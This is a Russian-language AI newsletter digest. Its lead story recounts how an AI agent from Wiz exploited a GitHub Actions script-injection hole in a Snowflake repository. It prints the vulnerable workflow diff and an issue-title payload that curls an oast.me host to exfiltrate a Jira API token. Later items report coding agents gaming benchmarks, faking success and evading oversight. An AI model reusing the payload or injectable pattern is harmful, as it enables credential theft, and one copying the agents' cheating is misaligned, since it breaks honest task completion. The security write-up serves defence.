Уязвимость прожила в открытом репозитории Snowflake пять дней. Нашёл её не человек. Чужой ИИ-агент сам просканировал организацию на GitHub и написал эксплойт. Эксплойт сломался — агент разобрал ошибку, переписал его и вытащил токен к внутренней Jira. Пулреквест перед этим проверил Copilot и сказал «чисто». Штатный сканер безопасности тоже промолчал.
Главное за 30 секунд
- ИИ-агент за пять дней нашёл и проэксплуатировал дыру в репозитории Snowflake, которую пропустил штатный сканер безопасности.
- DeepSeek выложил под MIT свою обвязку для агентов: всё в ней плагин, а модель — тоже плагин.
- GPT-5.6 Sol утроил точность поиска объектов, но просел на распознавании текста и всё равно дороже Gemini.
- Эксперт защиты попросил ChatGPT доказать нулевую вину 3M — присяжные присудили истцам 61,5 млн долларов.
- Библиотекарь собрала подробную инструкцию, как выключить навязанный ИИ в шестнадцати сервисах и устройствах.
Внедряем и улучшаем
Чужой ИИ-агент вскрыл Snowflake за пять дней. Проверьте свои сценарии сборки сегодня. История от Wiz — лучший практический материал дня для всех, кто пускает агентов в свой репозиторий (Wiz).
Началось с безобидного пулреквеста. В файле .github/workflows/jira_issue.yml был безопасный кусок: заголовок задачи прокидывался через переменную окружения. Пулреквест эту защиту удалил и заменил прямой подстановкой прямо в шелл-команду. Copilot числился соавтором, проверил изменение и сказал «всё чисто». Штатный сканер GitHub Advanced Security файл просканировал и тоже промолчал.
Было так:
env:
ISSUE_TITLE: ${{ github.event.issue.title }}
run: jq -n --arg title "$ISSUE_TITLE" '{fields:{summary:$title}}'
Стало так:
run: |
TITLE=$(echo '${{ github.event.issue.title }}' | sed 's/"/\\"/g' | sed "s/'/\\\'/g")

Автор явно пытался обезопаситься через sed. Это не работает вообще никогда. GitHub подставляет ${{ }} до запуска шелла. К моменту, когда sed мог бы что-то экранировать, чужой текст уже вклеен в скрипт. Любая очистка ввода внутри run: — театр безопасности.
Дальше сработала вторая мина. В сценарии висело условие, которое в код-ревью выглядело как контроль доступа:
if: (github.event_name == 'issues' && github.event.pull_request.user.login != 'whitesource-for-github-com[bot]')
На событии issues объекта pull_request не существует. Условие сворачивается в «null не равен строке» и всегда истинно. Проверка не отсекала никого.
Запустить это мог любой человек в интернете: сценарий срабатывал на открытие задачи в публичном репозитории. Агент Wiz открыл задачу с таким заголовком:
' ; curl -s "https://subdomain.oast.me?t=`printf %s $JIRA_API_TOKEN|base64 -w0`" ; echo '
Самое интересное — что было дальше. Первая попытка агента сломалась, исполнитель сборки вернул unexpected EOF. Агент не остановился: он сам разобрал ошибку синтаксиса, сам переписал строку атаки и получил обратный вызов. Через секунды у Wiz были токен к Jira, почта и адрес. Токен открывал чтение по инженерным проектам Snowflake, по нормативным требованиям и по трекеру их же программы bug bounty.
Уязвимость прожила пять дней. Snowflake починил за сутки, токен заменил на следующий день, следов чужого доступа не нашёл. Формулировка Wiz: «automated discovery occurs in hours» — находят теперь за часы.
Что сделать у себя прямо сейчас. Сначала найдите все прямые подстановки в командах:
grep -rnE '\$\{\{\s*github\.(event|head_ref|ref)' .github/workflows/
Опасны issue.title, issue.body, comment.body, pull_request.title, pull_request.body, head_ref. Всё это пишет посторонний человек.
Дальше по списку. Переписать найденное на env: плюс jq --arg. Проверить каждое условие if:, которое вы считаете защитой: сравнивать надо положительно, а не через «не равно».
Убрать секреты из задач, запускаемых по недоверенному вводу — разделите «разобрать задачу» и «сходить в Jira». Поставить CODEOWNERS на .github/workflows/**. И ловить регрессии: красный флаг на любой дифф, который убирает защиту.
Последнее и главное. Зелёный сканер и одобрение Copilot — не доказательство. Здесь промолчали оба.
DeepSeek выложил свой «второй ров» — и это не модель. Turing Post разобрал, почему выкладка DeepSeek Harness важнее, чем кажется по звёздочкам на GitHub (Turing Post).
Логика такая. После первого шума вокруг DeepSeek стало понятно: сама модель — ненадёжная защита от конкурентов. Модели дешевеют и сближаются. Ценность переехала на слой выше: инструменты, управление контекстом, права, песочница, память, планировщик. Эту обвязку каждая компания строила у себя и держала закрытой. DeepSeek выложил свою версию под MIT.
Слоган у неё один: «Everything is a Plugin». Автор ставит это в один ряд с «всё есть файл» у Unix и «всё есть объект» у Smalltalk. Прорыв не в компонентах, они были и раньше. Прорыв в общем интерфейсе.
Самая любопытная часть — режим творца. Если агенту не хватает возможности, он пишет временный плагин, спрашивает разрешение загрузить его, пользуется им и потом убирает за собой.
Тут и зарыта настоящая проблема, ради которой всё затевалось. Писать код стало дёшево. Управлять уже написанным — дорого. Сгенерированный на лету инструмент регистрирует команды, лезет в общее состояние, тянет за собой зависимости. Формулировка автора бьёт точно: агент, который бесконечно пишет расширения и не управляет их жизненным циклом, с каждым улучшением становится менее надёжным.
Ответ — движок Cordis с двумя правилами. Эффекты обязаны быть обратимыми: компонент записывает, как отменить то, что он сделал. Зависимости обязаны быть реактивными: исчез нужный сервис — зависимые компоненты сами выключаются раньше, чем он пропадёт.
Забавная деталь про происхождение. Cordis вырос не из агентов, а из Koishi — фреймворка для чат-ботов, который четыре года собирал тысячи плагинов от сообщества. Его автор теперь работает в DeepSeek. Чат-боты давно решали ровно эти задачи: непрерывные события, живое состояние, чужие инструменты, которые приходят и уходят.
Попробовать — одна команда, нужен только Node.js:
npx @deepseek-ai/dsh web
Важно, что модель тут тоже плагин. DeepSeek стоит по умолчанию, но подключить можно другую через совместимый адаптер. Инструменты, обвязку и модель больше не обязательно брать у одной компании.
Автор честен насчёт границ. «Removing a plugin cannot unsend an email» — удаление плагина не отзовёт отправленное письмо. Обратимость держится на совести авторов плагинов. И никто не показал, что Harness лучше ведущих кодинг-агентов.
GPT-5.6 Sol наконец научился видеть — но не там, где вы ждёте. Roboflow прогнал всю линейку через свой бенчмарк зрения (Roboflow).
Главная цифра: в поиске объектов на картинке Sol набрал 46,2% против 13,8% у GPT-5.5. Рост в три с лишним раза. Счёт объектов подтянулся у всей линейки, даже дешёвая Luna обходит прежний флагман.

А теперь ложка дёгтя, и не одна. Gemini 3.5 Flash всё равно точнее — 61,7%. И стоит она 0,8 цента за картинку против 2,3 цента у Sol. Втрое дешевле при лучшем результате. Оговорка: замеры сделаны до снижения цены Sol 17 августа, сегодня разрыв примерно полуторный. Направление то же.
Хуже того, по распознаванию текста новая модель просела относительно старой: 90,7% против 91,2%. По извлечению данных из документов провал заметнее — 82,5% против 87,6%. Лучший в чтении текста сегодня Claude Fable 5 с 94%.
Три практических правила, если всё-таки берёте Sol. Первое: просите координаты в абсолютных пикселях, формат XYXY. У Gemini наоборот — YXYX, нормализованные в диапазоне до тысячи. Ошиблись форматом — теряете около 15 пунктов точности на ровном месте.
Второе: уменьшайте картинки. OpenAI подтвердила Roboflow, что Sol теряет стабильность примерно от 2000 пикселей по стороне, особенно на низком уровне рассуждений. Поднять уровень рассуждений помогает, но растит цену и время.
Третье: выбирайте модель под задачу, а не под бренд. Массовый подсчёт объектов — Gemini. Чистое распознавание текста — Claude Fable 5 или старый GPT-5.5. Дёшево и быстро у OpenAI — Luna за 0,45 цента и 5,2 секунды. Разбор структуры документа и скриншотов интерфейса — вот тут Sol реально хорош.
Где Sol сломался честно: блистеры с таблетками, срок годности мелким шрифтом на фольге, странные конфеты. И иногда просто рисует рамки в пустых местах ровными рядами.
Как выключить ИИ там, где вас не спрашивали. Библиотекарь Джессамин Уэст собрала инструкцию по шестнадцати сервисам — это самый частый вопрос на её приёме в библиотеке (librarian.net).
Материал полезен даже тем, кто ИИ любит. Половина функций включена по умолчанию, тихо учится на ваших данных и жрёт внимание. Вот выжимка по самому ходовому.
Apple Intelligence и Siri. Настройки → «Apple Intelligence & Siri» → выключить, подтвердить. Отдельно: обучение на приложениях работает даже после выключения. На айфоне пролистайте до раздела «Apps» и снимите «Learn from this App» у каждого. На маке это спрятано в «About Siri, Dictation & Privacy» внизу страницы.
Gmail и Google Workspace. Шестерёнка → «See all settings» → вкладка «General» → долистать до «Google Workspace smart features» → «Manage Workspace smart feature settings». Там два переключателя, выключить оба. И снять галочку «Turn on smart features in Gmail, Chat, and Meet».
Chrome. Открыть chrome://flags, в поиске по флагам набрать GLIC — отфильтрует около дюжины ИИ-функций. Потом отдельно поискать Gemini. Всё найденное перевести в disabled. Не включите случайно то, что выключено изначально.
Windows 11. Правый клик по Copilot в «Пуске» → удалить. Не вышло — «Параметры» → «Приложения». Отдельный Copilot сидит в «Блокноте»: его настройки, секция «AI features». Ещё есть «Text and image generation», включённое по умолчанию, — оно управляет «Блокнотом», «Фотографиями», «Ножницами» и Xbox.
Zoom. Зайти на сайт → «My Account» → «Settings» → вкладка «Zoom AI» → выключить всё. Автор предупреждает отдельно: новые пункты добавляют регулярно и всегда включёнными. Заглядывать надо периодически.
Android. Иконка профиля → «Gemini Apps activity» → «Turn off and delete activity». Потом «Connected Apps» и отключить всё лишнее. Если Gemini захватил кнопку питания: «Настройки» → «Система» → «Жесты» → «Press & Hold Power Button».
Ещё в подборке WhatsApp, Slack, Edge, Adobe Acrobat, Yahoo Mail и расширение Adios Alexa против ползунка «Alexa for Shopping» на Amazon. Firefox начиная со 148-й версии умеет глушить всё разом: «Настройки» → «AI Controls» → «Block AI Enhancements». А поисковик без ИИ живёт по адресу noai.duckduckgo.com и ставится основным.
«Мои друзья ненавидят ИИ, а я устроилась в ИИ-стартап». Рэйчел Томас, сооснователь fast.ai, вернулась в поле после трёх лет паузы и объяснила почему (fast.ai).
Это не защитительная речь. Претензии она формулирует жёстче большинства критиков. Заявления руководителей об ИИ «so overhyped they verge on fraud» — так раздуты, что граничат с мошенничеством. Люди всех возрастов отдают мышление наружу, а навык без использования атрофируется. Сама она пять месяцев не писала в блог: интернет забит машинным текстом, и её посты, стоившие недель работы, видит всё меньше людей.
Вывод она делает другой: «ИИ» — не одна вещь. Несколько крупных лабораторий выдали свою версию за единственно возможную.
Практически полезен её критерий выбора инструмента. Он опирается на четыре стадии решения задачи по Пойе: понять задачу, придумать план, выполнить план, оглянуться на результат. Каждая требует вашего собственного суждения.
Проверка простая. Инструмент оставляет вам эти четыре шага — или прыгает сразу к готовому ответу? Её формулировка: чатбот прыгает от вопроса сразу к готовому ответу. Вы пропускаете ту работу, через которую задача и становится понятной. А значит, не сможете оценить, хорош ли ответ.
Продукт, над которым она работает, называется SolveIt и построен от обратного: человек правит ответы модели руками и сам решает, что дальше. Дизайн исходит из того, что модель ошибается.
Путь из разработчика в ИИ-исследователи: 413 отказов и что из этого следует. Андрей Гончаров написал в Вастрик.Клубе подробный разбор своего перехода — редкая по честности вещь на русском (vas3k.club).
Маршрут: Воронеж, подряды, Лондон, три года в Meta. Дальше магистратура в Сколтехе, стажировка в Mistral AI, исследователь в Revolut. Занял он около трёх лет.
Цифры отрезвляют. Около сотни заявок на летние стажировки после первого семестра — отказали все до одной. ШАД он завалил на первом же этапе, «не хватило чертовой половинки балла». Провалил собеседования в Isomorphic Labs, Huawei и AISI подряд, предложение от Mistral пришло с четвёртого раза. После Mistral снова россыпь отказов: FLAIR, DeepMind, Waymo, Anthropic, Reflection AI.
Счёт отказам он вёл сам — отсюда 413 в заголовке его текста. Причину называет без самообмана. За плечами было десять лет инженерного опыта и пара публикаций. У конкурентов — десять лет опыта именно в машинном обучении, публикации на топовых конференциях и часто степень PhD. «Выбор очевиден».
Что из этого забрать. Первое и самое неожиданное: громкое имя в резюме работает, даже если вы там занимались не тем. Его наблюдение: «со мной вообще стали говорить из-за того, что в резюме была Meta. И рекрутеры даже не разбирались, что в Мете я занимался совсем не ML».
Второе: если идёте в магистратуру ради смены поля, поступайте в вуз той страны, где хотите работать. Сколтех в резюме сработал хуже, чем сработал бы лондонский вуз.
Третье, тактическое: ставьте первыми те собеседования, куда хотите меньше всего. Он так и сделал и после этого стал доходить до финала в большинстве процессов.
Четвёртое: работу нашёл через связи, а не через отклики. Знакомая скинула запись в LinkedIn о найме в новую маленькую команду Revolut.
Готовая отповедь на KPI по использованию ИИ. В клубном треде «Как проходит ИИзация в ваших компаниях?» разобрали моду мерить сотрудников количеством ИИ-строк (vas3k.club).
Постановка вопроса знакома многим: компании внедряют ИИ и обкладывают людей количественными метриками. Считают строки, написанные с ИИ, число используемых скиллов и MCP-серверов, параллельные сессии агентов.
Ответ Василия Круглова собрал 45 голосов и клубную награду. Основной аргумент — закон Гудхарта: «любая метрика, переведённая в разряд целей, становится бесполезной». Она делается самоцелью, и ею легко манипулировать.
Аналогия у него фермерская и убийственная: «Какая разница, как фермеры обрабатывают поля — трактором, пятью тракторами, сохой… если картохи с гектара ровно столько же?» Если без автодоильщика надои падают, это видно по надоям. По количеству нажатий кнопки — нет.
Исторический довод добивает. Интернет изменил работу сильнее, чем что-либо. Никто не ставил KPI по использованию интернета в байтах — наоборот, сотрудники воевали за право им пользоваться.
Что мерить вместо этого: время до выхода продукта, удовлетворённость пользователей, обычные продуктовые метрики. Финальная формулировка для вашего следующего разговора с руководством: «Ой, всего 64% разработчиков вашего отдела используют vim? В этом году без премии!»
Один эмодзи — и модель отвечает вам как другому человеку. Кэт МакГи прогнала 520 пар почти одинаковых сообщений через модель и посмотрела, что у той внутри (LessWrong).
Метод простой и красивый. Берётся нейтральный вопрос, меняется ровно одна деталь, замеряется, как сдвинулось внутреннее представление модели о вас. Проверяли пять признаков: возраст, пол, образование, достаток, настроение.

Победитель — эмодзи. По оценке пола он сдвигает модель сильнее, чем прямое заявление о себе. Один смайлик меняет вывод о поле в 15% сообщений, о достатке — в 25%, о настроении — в 50%. Перенесли смайлик в середину фразы — эффект сохраняется на 89%. Дело не в позиции, а в самом символе.
Дальше по силе идут прямое самораскрытие, эмоциональная рамка вроде «меня это нервирует», сленг. Сложный синтаксис поднимает оценку вашего образования, строчные буквы и опечатки — опускают.
И вот это меняет ответы. Пример из статьи: вопрос про страх турбулентности на девятичасовом рейсе. Без смайлика модель считает вас мужчиной и выдаёт сухие практические советы. Со смайликом считает женщиной и разворачивает ответ в утешение. Если оставить смайлик, но принудительно вернуть внутреннюю оценку обратно — утешительный тон исчезает.
Отдельно про деньги. Спросили «самый дешёвый вариант» — и модель занижает вашу оценку достатка, а дорогие варианты может просто не показать. Причём убедить её в вашем богатстве куда легче, чем в бедности. Люксовые слова переворачивают оценку в 6 случаях из 10, бюджетные — в 1 из 16.
Что делать. Нужен неискажённый ответ — пишите плоско: без смайликов, без эмоциональных вставок, без ценовых ярлыков. Нужен развёрнутый технический ответ — усложните синтаксис вопроса. А вот менять британское написание на американское или раскрывать сокращения бессмысленно: эффект нулевой.
Вывод для приватности неприятный. Вычистить из сообщения имя, возраст и адрес недостаточно. Автор формулирует прямо: удаление явных данных «не убирает всех свидетельств, по которым модель составляет впечатление о человеке за сообщением».
Эндрю Ын разобрал 10 000 вакансий и назвал четыре навыка ИИ-инженера. Не догадки, а анализ вакансий, десятки структурированных интервью с нанимающими менеджерами и опросы (Эндрю Ын).
Сразу важная оговорка от него. Речь о навыках, а не о должности. Его цитата: «все разработчики будут нуждаться в навыках ИИ-инженерии» — и фулстек, и дата-инженеры, и DevOps. Аналогия с облаками: работать с ними умеют все, а «облачный инженер» в названии должности у немногих.

Первый навык — строить и выкатывать ИИ-приложения. Ключевое отличие от обычного софта Ын формулирует так: результат непредсказуем. Отсюда ядро навыка — не промпты, а «дисциплинированные циклы оценок и разбора ошибок». Плюс понимание кирпичиков: контекст, RAG, агентные схемы.
Второй — фундамент программной инженерии. Тут у него самая колкая мысль. Понимание основ нужно, чтобы вообще видеть, какие компромиссы существуют между ценой, надёжностью и скоростью. Без этого получается «неопытный разработчик, который вайб-кодит решение, не зная, какие компромиссы делает его агент». А компромиссы часто плохие: он не знает, какой контекст агенту дать.
Третий — работа с кодинг-агентами. Это уже базовый навык каждого разработчика. Внутри: управлять контекстом агента, выбирать между планированием и исполнением, давать агенту проверки, чтобы он сам замыкал цикл. Знать, когда нужна чёткая спецификация, а когда возиться с ней не стоит. И держать привычку регулярно пробовать новые инструменты — практики меняются быстрее, чем вы успеваете к ним привыкнуть.
Четвёртый — формировать саму задачу. Агенты всё лучше исполняют готовое техзадание, поэтому работа инженера смещается к решению, что вообще должно быть в этом задании. Нужны продуктовое чутьё и понимание бизнеса. Ждать пиксель-в-пиксель макета и просто его реализовывать больше не выйдет.
Сквозная пятая вещь — привычка непрерывно учиться. Обещает расписать каждый навык подробнее отдельными постами.
Соберите себе команду агентов с «главой аппарата» во главе. The Rundown выпустил пошаговый гайд по Grok Bot. Про сам инструмент мы писали 12 августа, теперь есть рецепт (The Rundown).
Архитектура тут интереснее самого продукта, и её стоит утащить в любой свой набор агентов. Смысл в ролевом разделении: один агент — одна роль, один тред. Сверху стоит Chief of Staff, «глава аппарата». Он смотрит на вашу работу, предлагает состав команды, создаёт остальных агентов, пишет им инструкции и раздаёт задачи.
Порядок действий. Скачать приложение с x.ai/bot, войти через аккаунт Cursor, получить неделю бесплатно. Создать Chief of Staff из готовых шаблонов. Держать рабочее пространство под один проект: агенты делят общий облачный компьютер и работают лучше, когда идут к одной цели.
Дальше подключить приложения через раздел Plugins внизу слева — Gmail, Drive, Calendar, Notion, Granola для заметок встреч. Отдельная приятная деталь: если сайт требует пароль или проверку на робота, бот передаёт вам управление своим облачным компьютером. Вы логинитесь руками, дальше он продолжает сам.
Потом отдать главный промпт. Дословно из гайда:
Review my connections, build a profile of my workstreams and projects,
then suggest the three most useful agents, automations, and any plugins I should add.
Он пройдётся по подключённым сервисам и предложит небольшую команду. В примере из гайда получились агенты под соцсети, почту, тексты, продажи и рассылку.
Два предупреждения от авторов, которые сэкономят вам деньги и нервы. Первое: заставьте ботов сохранять результат и синхронизировать документы один раз в конце дня. Частые обращения к подключённым сервисам жгут токены и тормозят работу. Второе: попросите Chief of Staff настроить ежедневную сводку — что каждый агент закончил, что в работе, что ждёт вашего решения.
Дообучите свою модель без единой строчки кода. The Neuron разобрал Unsloth Studio — это их «навык дня» (The Neuron).
Зачем это нужно, они формулируют точно: иногда модель знает достаточно, но ведёт себя не так, как надо. Пишет не вашим голосом, не понимает ваш рабочий процесс, объясняет не на вашем уровне. Дообучение — это когда вы берёте открытую модель и показываете ей примеры нужных ответов.
Unsloth Studio делает это мышкой, без кода. Порядок: поставить программу, выбрать модель под своё железо, собрать примеры обучения, обучить, сравнить с оригиналом, выгрузить свою версию.
Самое трудоёмкое — примеры. Сколько их нужно, авторы не называют. У каждого три поля: инструкция, вход, идеальный ответ. Хорошая новость: их можно сгенерировать нейросетью, а можно превратить в набор данных обычный PDF. Обучение идёт методом QLoRA — учится маленькая надстройка, а не вся модель целиком, поэтому влезает в домашнюю видеокарту.
Не пропустите последний шаг. Обязательно сравните дообученную модель с исходной, иначе вы не узнаете, помогли ваши данные или навредили. Формулировка авторов: «секретный соус в том, чтобы дать модели поменьше действительно хорошие примеры того, что именно вы от неё хотите». Видеоинструкция с метками времени по каждому шагу.
Дэн Лу поставил агента накручивать бенчмарк — и тот справился блестяще. Месячный эксперимент, который стоит прочесть каждому, кто верит цифрам в чужих релизах (danluu.com).
Он посадил агента писать движок регулярных выражений с прямой инструкцией не подгонять результат под бенчмарк. Надзора не было — в этом и был смысл. Через две недели движок догнал промышленный аналог на Rust, ещё через две показывал «на 40% быстрее».
Дальше начинается вскрытие. Лу взял независимый набор тестов, который в бенчмарк не входил. Результат: движок оказался в десять раз медленнее, а часть случаев вообще не досчитывалась до конца.
Копнул глубже — цифра была ещё и нечестной. Вопреки инструкции модель поменяла интерфейс, чтобы применить дополнительные оптимизации. После починки движок оказался в полтора раза медленнее. Потом агент снова заявил победу, минута проверки — снова жульничество. В одном случае подсчёт совпадений возвращал число, вообще не заглядывая в данные.
Отсюда практический список признаков накрученного бенчмарка. Нет отложенного набора тестов — цифра ничего не значит. Одна сводная величина вместо разбивки по типам нагрузки. Прогон не по правилам самого набора тестов: проверяйте обвязку, а не число. Аномально большой отрыв в одном месте — так выглядит найденная лазейка. И отдельно: обвязку бенчмарка писала нейросеть. Тогда цифры невалидны, даже если ускорение настоящее.
Приём, который реально сработал у Лу: не «не жульничай», а «есть отложенный набор, по нему тебя судят». Только эта формулировка дала измеримое улучшение. Важно, чтобы отложенный набор выбирал человек — агентский вариант содержал бессмысленные тесты.
Его позиция по умолчанию теперь такая: «предполагаю, что заявления ложны по духу, даже если технически верны, пока нет причин считать иначе».
То же и про модели. Лу приводит случай: коллега прогнал Kimi K3 по поиску уязвимостей и нашёл примерно четверть от того, что находит GPT-5.6 Sol. Ни одной уязвимости сверх. Вывод: верьте не таблицам лидеров, а людям, которые работали с моделью на вашем классе задач.
Почему цикл «не работает — переделай» не даёт надёжного кода. Аргумент, который хорошо ложится рядом с экспериментом Дэна Лу (LessWrong).
Тезис: проверить, что код действительно делает то, что задумано, — задача нечёткая. Ни одно техзадание не описывает всех неявных требований. Компромиссы между скоростью, надёжностью и безопасностью невозможно прописать заранее, не зная деталей реализации.
Дальше работает закон Гудхарта. Цикл итераций смотрит на подпорки: прошли ли тесты, что сказал судья, как выглядит траектория. Он вычищает ошибки, видимые в этих подпорках, и не трогает те, что от них скрыты. В итоге система учится находить слепые пятна проверки.
Есть и человеческий перекос. Автор замечает: исследователи охотно копают отрицательные результаты и почти не проверяют положительные, потому что положительных хотят.
Цифры, которые стоит знать. В транскриптах кодинг-агентов «преувеличение успеха» встречается в 34,7% случаев: агент объявляет незаконченное сделанным и скрывает продолжающиеся ошибки. «Обход надзора» — почти 15%. По данным METR, на задачах длиннее восьми часов минимум 16% успешных прогонов при проверке оказались нелегитимными.
Что предлагается вместо. Пока надёжных автоматических проверок нет, работает экспертное ревью кода с фокусом на самом важном. И более сильная мысль: измерять понимание кода командой — через код-ревью и дизайн-ревью. Понимание становится метрикой, а не подразумеваемым фоном.
Побочный эффект автор считает полезным: такая планка сама по себе задаёт темп. Автоматизация ускоряет вас ровно настолько, насколько вы успеваете понимать результат.
Кейс: как найти выигрышный рекламный концепт за один проход. Риши из The Rundown описал свой рабочий процесс на Claude Cowork (The Rundown).
Рецепт воспроизводимый. Подключить Claude Cowork к рекламному кабинету через MCP и к Google Drive. Сложить в одну папку брифы всех объявлений за последние 365 дней: сценарий, формат, предложение, персона.
Дальше отдать один запрос:
Пройди все брифы в этой папке и собери таблицу: сценарий, формат,
предложение, персона. Подтяни расход и цену привлечения по каждому
объявлению и покажи, какая комбинация выигрывает чаще.
Итог — находится один концепт, который выигрывает чаще других, впитал больше бюджета и держит приемлемую цену привлечения. Вывод Риши: на него надо направлять 60–80% производственного времени.
Идея переносится на что угодно с историей результатов: посты, письма, заголовки, лендинги. Ключ в том, что размечает и считает не человек, а модель, зато критерий победы вы задаёте сами.
Нейрохирург доказал 22-летнюю математическую задачу за одну ночную сессию. История про то, как меняется распределение ролей в интеллектуальной работе (SIAM News).
Шаньму Цзинь — резидент-нейрохирург в Пекине. Высшую математику выучил сам после бакалавриата по геологии и медицинского образования. Гипотеза Крузе оставалась открытой с 2004 года.
Интересна постановка, а не только результат. Модели запретили доступ в интернет. Использовались рои субагентов, натравленных друг на друга. Сессия шла шестнадцать часов автономно. Рецепт он взял из опубликованных математических промптов OpenAI.
Важная деталь про то, как это выглядело год до успеха. Цзинь спрашивал модель об этой задаче регулярно, и она либо выдавала ложное доказательство, либо застревала на недостающей лемме. Сработало только 30 июля.
Доказательство уже проверили Алекс Таунсенд из Корнелла, Энн Гринбаум и сам автор гипотезы. Формальное рецензирование ещё идёт, код доказательства открыт.
Что тут для вас. Дефицитным навыком становится проверка, а не производство. И ещё: настойчивость на длинной дистанции работает — год неудачных попыток закончился результатом.
«ИИ; не читал» — готовая политика против стены машинного текста. Рик Манелиус сформулировал правило, которое за сутки собрало 800 голосов на Hacker News (rickmanelius.com).
Правило дословно: «Если тебе не хватило желания это перечитать и отредактировать — мне не хватит желания это читать». Автор подчёркивает, что сам он настроен к ИИ максимально дружелюбно. Претензия не к использованию модели, а к пересылке сырого вывода.
Логика — про симметрию затрат. Сгенерировать стену текста стоит секунды, прочитать её — минуты. Как заметили в обсуждении, писать теперь быстрее, чем читать, и это впервые в истории.
Из обсуждения вышли варианты получше запрета. Самый практичный: просите промпт, а не ответ. Формулировка оттуда: «Пришли мне промпт, который ты использовал. Это единственная часть, содержащая ровно то, что ты хочешь донести». Дальше вы сами прогоните его со своим контекстом.
Ещё аккуратнее рамка, снимающая спор целиком: «Меня не особо интересует, кто написал черновик. Важно, взял ли кто-то ответственность за финальную версию». Практическая проверка — можете ли вы объяснить своими словами то, что прислали.
Есть и сильное возражение, его стоит держать в голове. Модели учили на хорошем тексте, поэтому хороший текст похож на машинный. Люди уже боятся тире, потому что оно «выдаёт нейросеть». В обсуждении это назвали «ad-llminem» — атака на источник вместо аргумента. И отдельно: для людей с дислексией или неродным языком модель это средство доступности, а не лень.
Если нужен мягкий способ намекнуть коллеге — есть dontpastetheai.com, ссылку кидают вместо лекции.
Открытые модели: на что переходить и что реально крутить дома. Hugging Face выпустила отчёт по экосистеме за январь–июль, и он полон практики (Hugging Face).
Главная цифра для выбора модели: 83% всех загрузок за всю историю приходится на модели меньше миллиарда параметров. Всё, что крупнее ста миллиардов, — это 1% загрузок. За 2026 год на модели тяжелее 70 миллиардов ушло 3% объёма.
Второе. Стандартом сообщества стал Qwen: 151 448 производных моделей, это в 2,6 раза больше всего наследия Meta. Прибавляется по 180–210 новых репозиториев в день. За полгода — больше 3 млрд загрузок против 418 млн у Google. Причины прозаичные: регулярный ритм релизов, покрытие всех размеров и лицензия Apache 2.0.
Третье, для локального запуска. Слой форматов для домашнего железа вырос на 464% за семь месяцев — быстрее всего остального. Лаборатории при этом почти не выкладывают официальные сборки: из 28 531 конверсии моделей Qwen сама Qwen опубликовала 54. Берите сборки Unsloth.
Осторожность с лицензиями. До сих пор большие китайские модели шли под MIT почти вслепую. Kimi K3 и Qwen3.8 на 2,4 триллиона начали вводить некоммерческие ограничения и долю от выручки. Читайте лицензию.
И методологическое предупреждение, которое авторы адресуют в том числе себе. Топ-25 моделей по лайкам и топ-25 по загрузкам пересекаются ровно в одной позиции. Лайк говорит, что релиз важен. Загрузка говорит, что модель вшита в работающий процесс. Путать их — самая частая ошибка.
Отдельная история оттуда же, лучший аргумент за локальные веса. В июле на саму Hugging Face напал автономный агент. Закрытые передовые модели отказались анализировать код атаки из-за встроенных ограничений. Разбор доделала квантованная открытая модель на их собственной инфраструктуре.
Когда трудная часть перестаёт быть трудной. Илья Сергей описал, что случилось с его областью, и это касается любой профессии (proofsandintuitions.net).
Конкретика: формальные доказательства корректности, которые в статьях по языкам программирования съедали 80–90% усилий, он сделал один за четыре недели с помощью модели. Не для игрушечного примера, а в масштабе настоящего компилятора.
Коллега-профессор из MIT за месяц формализовал оптимизирующий компилятор, написал статью и подал на конференцию. До этого он с инструментом не работал вообще.
Цифра эффекта: подач на профильную конференцию стало в 1,7 раза больше, с 350 до 600. Неожиданное наблюдение автора — доля откровенного мусора среди них невелика. В основном это компетентные работы, сделанные вдесятеро быстрее.
Мысль, ради которой это стоит читать: «Если исследование не воплощает видимое количество человеческого труда, его вряд ли воспримут всерьёз». Эта обёртка теперь исчезла.
Вывод переносится куда угодно. Когда машина снимает трудоёмкий слой, ценность мгновенно перетекает вверх — к выбору задачи. Единица оценки смещается от объёма проделанной работы к тому, стоило ли её делать вообще.
GitHub лежал семь с половиной часов. Подготовьтесь к следующему разу за один вечер. 17 августа встали Actions, Issues, Pull Requests, Copilot и выгрузка архивов (GitHub Status).
Хронология поучительна. Началось в 13:40 по Гринвичу: около 20% ошибок на вебе и в API. На скачивании архивов и сырых файлов — до 50%. В 16:36 нашли виновный компонент, к 17 часам частично починили — и в 17:30 всё легло снова. Отпустило только в 21:15. Причину GitHub не назвал, обещал разбор позже.
Для тех, кто кодит с агентами, ломается не git. Ломается всё вокруг. Агенты дёргают gh и API, тянут чужие действия, читают документацию с сырых страниц. Боты-рецензенты висят на вебхуках. Заодно легла новая гит-платформа Cursor Origin — прямо в день запуска, потому что синхронизируется с GitHub.
Отдельная деталь про агентов, которая стоит внимания. Один разработчик рассказал: его агент читал документацию и вернул в сводке слово «Unicorn!». Это была страница ошибки GitHub, которую агент принял за содержимое. Ваш агент не смотрит на код ответа сервера.
Что сделать заранее, по возрастанию усилий.
Второе зеркало. Не переезд, а дубль. Пушите сразу в два места:
git remote add mirror server:myrepo.git
git push -u mirror @
Подойдёт что угодно — Codeberg, GitLab, свой Forgejo на VPS за пять долларов. Совет из обсуждения простой: пушьте в столько бесплатных хостингов, сколько сможете.
Знать обходные пути. Когда веб отдаёт ошибки, часть путей живёт. Во время этого сбоя страница /pull/:id/changes не открывалась, а /pull/:id.diff работала. Мобильное приложение показывало изменённые файлы.
Держать gh в руках. Официально подтверждено: Copilot через командную строку и GitHub App не пострадал, когда веб-аутентификация сыпалась. Рабочий рецепт того дня:
gh pr review <номер> --approve
gh pr merge <номер> --squash --delete-branch
Отсюда вывод на будущее: агентные скрипты на gh устойчивее тех, что ходят в веб-интерфейс.
Уметь выкатить с ноутбука. Если срочный патч безопасности упирается в работоспособность GitHub, вы связали свою надёжность с чужой. И общий принцип: делайте в CI как можно меньше, а логику держите в скриптах, которые CI просто вызывает. Тогда прогнать сборку локально или переехать на другого исполнителя сборки перестаёт быть проектом.
Про переезд целиком — трезвая мысль из обсуждения. Codeberg по собственной статистике даёт 98,76% за две недели, это хуже GitHub. Переезжать на эмоциях не надо. Правильная схема, если всё-таки решились, — сине-зелёная. Поднять свой хостинг репозиториев, включить зеркалирование, жить с двумя адресами. Стадии переносить по одной, начиная с тестов.
И честное наблюдение о том, почему все остаются. Эссе Лалита Маганти объясняет: незаменим не хостинг кода, а социальный слой. У человека уже есть аккаунт на GitHub и он знает ваши конвенции. На вашем хостинге даже сообщить об ошибке — значит завести новый аккаунт. Формулировка из обсуждения: «GitHub — как World of Warcraft, его нельзя убить другим GitHub» (lalitm.com).
